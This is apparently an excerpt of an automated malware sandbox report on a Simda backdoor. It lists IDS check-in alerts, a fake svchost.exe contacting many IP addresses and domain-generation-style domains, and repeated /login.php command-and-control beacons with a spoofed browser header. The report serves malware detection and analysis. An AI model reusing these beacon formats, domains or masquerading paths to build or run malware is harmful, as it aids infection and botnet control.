Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59240 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52127 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49732 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49748 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49730 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49770 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54664 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54701 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54680 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54647 -> 75.2.71.199:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54645 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50210 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52171 -> 188.114.96.3:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: qexyhap.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 45.79.19.196 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: purygeg.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: lyryjir.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vojycit.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lymylen.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.122 80Jump to behavior
Queries Google from non browser process on port 80
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww8.galyqaz.com Connection: Keep-Alive Cookie: vsid=903vr478893028933998491
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww3.galyqaz.com Connection: Keep-Alive Cookie: vsid=903vr478893028933998491
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731347439.2338786
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731347439.3564880
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731347439.3564880
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731347439.2338786
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731347439.2338786
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
